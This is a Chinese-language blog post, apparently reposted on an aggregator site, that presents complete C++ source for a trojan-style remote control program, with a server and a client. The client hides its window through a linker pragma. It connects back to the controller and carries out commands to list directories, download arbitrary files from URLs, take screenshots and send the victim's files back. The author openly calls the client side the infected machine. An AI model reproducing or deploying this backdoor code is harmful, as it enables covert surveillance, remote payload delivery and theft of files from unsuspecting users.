文件傳輸采用的winsock ，截屏采用的上一個帖子，下載文件采用上上個帖子，反正你在這個博客里搜一下就可以看到了，查看文件目錄也是。。。不多說了，上代碼。

?

關于欲兒遠控的說明命令大全?dir-查詢目錄（查詢對方指定路徑的文件）——例如：dir-D:\\ down-下載鏈接-保存路徑（讓對方下載指定鏈接的文件）——例如：down-http://www.anyuer.club-D:\\index.ph screen-保存路徑（截取對方的屏幕）——例如：screen-D:\\001.jpg pass-對面硬盤文件路徑-你自己保存的文件路徑（讓對方文件傳輸至你的電腦）——例如：pass-D:\\001.jpg-E:\\002.jpg以上《對方》是指中病毒的那一邊。《自己》是指后臺管理者

?

?

?

現在上來的是服務器端的程序

/*server*/ #include?<winsock2.h> #include<stdio.h> #include<iostream> #include<string> #include?<cstring> #include?<fstream> using?namespace?std; #pragma?comment(lib,"ws2_32.lib")//鏈接這個庫?//TCP服務器端?void?RecvFile(SOCKET?sClient,?string?SaveFileName); int?connect();int?main() {int?temp?=?10;while?(true){if?(temp?==?10){temp?=?connect();}else{}}return?0; }int?connect() {//調用winsock?WORD?sockVersion?=?MAKEWORD(2,?2);//請求使用的winsock版本?WSADATA?wsaData;???//?實際返回的winsock版本??if?(WSAStartup(sockVersion,?&wsaData)?!=?0){}//創建socket?SOCKET?slisten?=?socket(AF_INET,?SOCK_STREAM,?IPPROTO_TCP);//參數分別為協議族，類型，協議號?AF_INET代表TCP/IP?if?(slisten?==?INVALID_SOCKET)//異常處理?{printf("scoket?error!\n");return?10;}//bindsockaddr_in?sin;?//服務器端點地址?sin.sin_family?=?AF_INET;?//協議族?sin.sin_port?=?htons(8888);?//端口號，?htons函數將本地字節順序變為網絡字節順序（16位）?sin.sin_addr.S_un.S_addr?=?INADDR_ANY;//服務器bind時需要使用地址通配if?(bind(slisten,?(LPSOCKADDR)&sin,?sizeof(sin))?==?SOCKET_ERROR)//LPSOCKADDR是類型強制轉換?{printf("bind?error?!\n");return?10;}//listenif?(listen(slisten,?5)?==?SOCKET_ERROR)//5為queuesize,緩存區大小?{?printf("listen?error?!\n");return?10;}//由于使用的是TCP?，socket?stream,要循環接收數據SOCKET?sClient;//聲明變量sockaddr_in?remoteAddr;int?nAddrlen?=?sizeof(remoteAddr);char?revData[1024];//bufferprintf("waiting?for?connect...\n\n");while?(true){printf("command：");string?data;getline(cin,?data);//鍵盤讀入數據const?char*?sendData;sendData?=?data.c_str();?//string變為const?char*sClient?=?accept(slisten,?(SOCKADDR?*)&remoteAddr,?&nAddrlen);//accept會新建一個socket?if?(sClient?==?INVALID_SOCKET){printf("accept?error?!");continue;//重新開始循環?}printf("someone?ip:?%s\r\n",?inet_ntoa(remoteAddr.sin_addr));?//inet將ip地址結構轉成字符串?，?\r是回車?//發送數據 send(sClient,?sendData,?strlen(sendData),?0);//接收數據?//接收文件if?(data.find("pass")?!=?string::npos)//pass-D:\\001.txt-D:\\002.txt{string?savepath?=?data.substr(data.find_last_of("-")?+?1);RecvFile(sClient,?savepath);}//接收字符串else{int?ret?=?recv(sClient,?revData,?1024,?0);printf("feedback：\n");while?(true){if?(ret?>?0){revData[ret]?=?0x00;printf(revData);ret?=?recv(sClient,?revData,?1024,?0);}break;}printf("\n\n");}closesocket(sClient);}closesocket(slisten);WSACleanup(); }void?RecvFile(SOCKET?sClient,?string?SaveFileName) {cout?<<?"receive?start"?<<?endl;const?int?bufferSize?=?1024;char?buffer[bufferSize]?=?{?0?};int?readLen?=?0;//string?SaveFileName?;?//這是服務器要接收的文件的保存路徑ofstream?desFile;desFile.open(SaveFileName.c_str(),?ios::binary);if?(!desFile){return;}do{readLen?=?recv(sClient,?buffer,?bufferSize,?0);if?(readLen?==?0){break;}else{desFile.write(buffer,?readLen);cout?<<?"receiving"?<<??endl;}}?while?(true);cout?<<?"receive?over\n\n"?<<?endl;desFile.close(); }

?

?

現在上來的是用戶端的代碼

/*client*/ #include<stdio.h> #include<iostream> #include<cstring> #include<string> #include?<tchar.h> #include?<io.h> #include?<sstream> #include?<afxwin.h> #include?<windows.h> #include?<cstring> #include?<fstream> #include?<winsock2.h> #include?<Urlmon.h> using?namespace?std; #pragma?comment(lib,"ws2_32.lib")//windowssock庫 #pragma?comment(lib,"Urlmon.lib")?//加入文件傳輸庫 #pragma?comment(?linker,?"/subsystem:\"windows\"?/entry:\"mainCRTStartup\""?)?//?這就是最重要的一個隱藏程序的代碼 //TCP客戶端 #define?_CRT_SECURE_NO_WARNINGS void?SendFile(SOCKET?sclient,?string?srcFileName); LPCWSTR?stringToLPCWSTR(std::string?orig); void?download(string?dourl,?string?a); string?dir(string?path); string?deal(string?things); int?connect(); void?Screen(char?filename[]);int?main() {int?temp?=?10;while?(true){if?(temp?=?10){temp?=?connect();}else{break;}}return?0; }void?SendFile(SOCKET?sclient,?string?srcFileName) {int?haveSend?=?0;const?int?bufferSize?=?1024;char?buffer[bufferSize]?=?{?0?};int?readLen?=?0;//string?srcFileName?;??//這是用戶端要發送的路徑ifstream?srcFile;srcFile.open(srcFileName.c_str(),?ios::binary);if?(!srcFile){return;}while?(!srcFile.eof()){srcFile.read(buffer,?bufferSize);readLen?=?srcFile.gcount();send(sclient,?buffer,?readLen,?0);haveSend?+=?readLen;}srcFile.close();cout?<<?"send:?"?<<?haveSend?<<?"B"?<<?endl; }LPCWSTR?stringToLPCWSTR(std::string?orig) {size_t?origsize?=?orig.length()?+?1;const?size_t?newsize?=?100;size_t?convertedChars?=?0;wchar_t?*wcstring?=?(wchar_t?*)malloc(sizeof(wchar_t)*(orig.length()?-?1));mbstowcs_s(&convertedChars,?wcstring,?origsize,?orig.c_str(),?_TRUNCATE);return?wcstring; }void?download(string?dourl,?string?a) {LPCWSTR?url?=?stringToLPCWSTR(dourl);printf("downurl:?%S\n",?url);TCHAR?path[MAX_PATH];GetCurrentDirectory(MAX_PATH,?path);LPCWSTR?savepath?=?stringToLPCWSTR(a);wsprintf(path,?savepath,?path);printf("savepath:?%S\n",?path);HRESULT?res?=?URLDownloadToFile(NULL,?url,?path,?0,?NULL);if?(res?==?S_OK){printf("downover\n");}else?if?(res?==?E_OUTOFMEMORY){printf("recvlength?has?something?wrong?or?dont?set?recvlength\n");}else?if?(res?==?INET_E_DOWNLOAD_FAILURE){printf("url?has?something?wrong\n");}else{printf("unkonwn?error\n",?res);} }string?dir(string?path) {string?result;long?hFile?=?0;struct?_finddata_t?fileInfo;string?pathName,?exdName;//????\\*?代表要遍歷所有的類型,如改成\\*.jpg表示遍歷jpg類型文件if?((hFile?=?_findfirst(pathName.assign(path).append("\\*").c_str(),?&fileInfo))?==?-1){}do{result?=?result?+?"\n"?+?fileInfo.name;}?while?(_findnext(hFile,?&fileInfo)?==?0);_findclose(hFile);return?result; }string?deal(string?things) {//分析命令if?(things.find("dir")?!=?string::npos)/*?????dir-D:\\????*/{string?result?=?things.substr(things.find_first_of("-")?+?1);string?temp?=?dir(result);cout?<<?temp?<<?endl;return?temp;}else?if?(things.find("down")?!=?string::npos)//down-http://www.anyeur.club-D:index.php{string?downurl?=?things.substr(things.find_first_of("-")?+?1,?things.find_last_of("-")?-?things.find_first_of("-")?-?1);string?savepath?=?things.substr(things.find_last_of("-")?+?1);download(downurl,?savepath);return?"download?over!";}else?if?(things.find("pass")?!=?string::npos)//pass-D:\\001.txt-D:\\002.txt{string?sendfile?=?things.substr(things.find_first_of("-")?+?1,?things.find_last_of("-")?-?things.find_first_of("-")?-?1);return?"pass-"?+?sendfile;}else?if?(things.find("screen")?!=?string::npos)//screen-D:\\001.jpg{string?savepat?=?things.substr(things.find_last_of("-")?+?1);char?savepath[20];strcpy(savepath,?savepat.c_str());Screen(savepath);return?"screen?over!";}else{return?"nothing";} }int?connect() {WORD?sockVersion?=?MAKEWORD(2,?2);WSADATA?data;if?(WSAStartup(sockVersion,?&data)?!=?0){printf("initialization?failed!\n");return?10;}while?(true){SOCKET?sclient?=?socket(AF_INET,?SOCK_STREAM,?IPPROTO_TCP);if?(sclient?==?INVALID_SOCKET){printf("invalid?socket!\n");return?10;}sockaddr_in?serAddr;?//要連接的服務器端?的?端點地址serAddr.sin_family?=?AF_INET;serAddr.sin_port?=?htons(8888);serAddr.sin_addr.S_un.S_addr?=?inet_addr("127.0.0.1");?//將ip變為地址結構//客戶端程序不需要bind本機端點地址,系統會自動完成?if?(connect(sclient,?(sockaddr*)&serAddr,?sizeof(serAddr))?==?SOCKET_ERROR){printf("connect?error!\n");closesocket(sclient);return?10;}char?recData[1024];string?a;int?ret?=?recv(sclient,?recData,?1024,?0);if?(ret>0){recData[ret]?=?0x00;cout?<<?"command："?<<?recData?<<?endl;string?CMD(recData);a?=?deal(CMD);}if?(a.find("pass")?!=?string::npos){string?sendfile?=?a.substr(a.find_last_of("-")?+?1);SendFile(sclient,?sendfile);closesocket(sclient);}else{string?data;data?=?a;const?char*?sendData;sendData?=?data.c_str();?//string21變為const?char*cout?<<?strlen(sendData)?<<?endl;send(sclient,?sendData,?strlen(sendData),?0);closesocket(sclient);}}WSACleanup(); }void?Screen(char?filename[]) {CDC?*pDC;//屏幕DCpDC?=?CDC::FromHandle(GetDC(NULL));//獲取當前整個屏幕DCint?BitPerPixel?=?pDC->GetDeviceCaps(BITSPIXEL);//獲得顏色模式int?Width?=?pDC->GetDeviceCaps(HORZRES);int?Height?=?pDC->GetDeviceCaps(VERTRES);printf("當前屏幕色彩模式為%d位色彩\n",?BitPerPixel);printf("屏幕寬度：%d\n",?Width);printf("屏幕高度：%d\n",?Height);CDC?memDC;//內存DCmemDC.CreateCompatibleDC(pDC);CBitmap?memBitmap,?*oldmemBitmap;//建立和屏幕兼容的bitmapmemBitmap.CreateCompatibleBitmap(pDC,?Width,?Height);oldmemBitmap?=?memDC.SelectObject(&memBitmap);//將memBitmap選入內存DCmemDC.BitBlt(0,?0,?Width,?Height,?pDC,?0,?0,?SRCCOPY);//復制屏幕圖像到內存DC//以下代碼保存memDC中的位圖到文件BITMAP?bmp;memBitmap.GetBitmap(&bmp);//獲得位圖信息FILE?*fp?=?fopen(filename,?"w+b");BITMAPINFOHEADER?bih?=?{?0?};//位圖信息頭bih.biBitCount?=?bmp.bmBitsPixel;//每個像素字節大小bih.biCompression?=?BI_RGB;bih.biHeight?=?bmp.bmHeight;//高度bih.biPlanes?=?1;bih.biSize?=?sizeof(BITMAPINFOHEADER);bih.biSizeImage?=?bmp.bmWidthBytes?*?bmp.bmHeight;//圖像數據大小bih.biWidth?=?bmp.bmWidth;//寬度BITMAPFILEHEADER?bfh?=?{?0?};//位圖文件頭bfh.bfOffBits?=?sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER);//到位圖數據的偏移量bfh.bfSize?=?bfh.bfOffBits?+?bmp.bmWidthBytes?*?bmp.bmHeight;//文件總的大小bfh.bfType?=?(WORD)0x4d42;fwrite(&bfh,?1,?sizeof(BITMAPFILEHEADER),?fp);//寫入位圖文件頭fwrite(&bih,?1,?sizeof(BITMAPINFOHEADER),?fp);//寫入位圖信息頭byte?*?p?=?new?byte[bmp.bmWidthBytes?*?bmp.bmHeight];//申請內存保存位圖數據GetDIBits(memDC.m_hDC,?(HBITMAP)memBitmap.m_hObject,?0,?Height,?p,(LPBITMAPINFO)&bih,?DIB_RGB_COLORS);//獲取位圖數據fwrite(p,?1,?bmp.bmWidthBytes?*?bmp.bmHeight,?fp);//寫入位圖數據delete[]?p;fclose(fp);memDC.SelectObject(oldmemBitmap); }

client的源代碼才是精華，server的沒什么卵用，好的再見，不想截圖懶得截圖。非要看效果就去嗶站看：https://www.bilibili.com/video/av62048845

?

源碼鏈接：https://github.com/yuer020611/Remote-Control

總結

以上是生活随笔為你收集整理的C++ 冰河木马的实现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。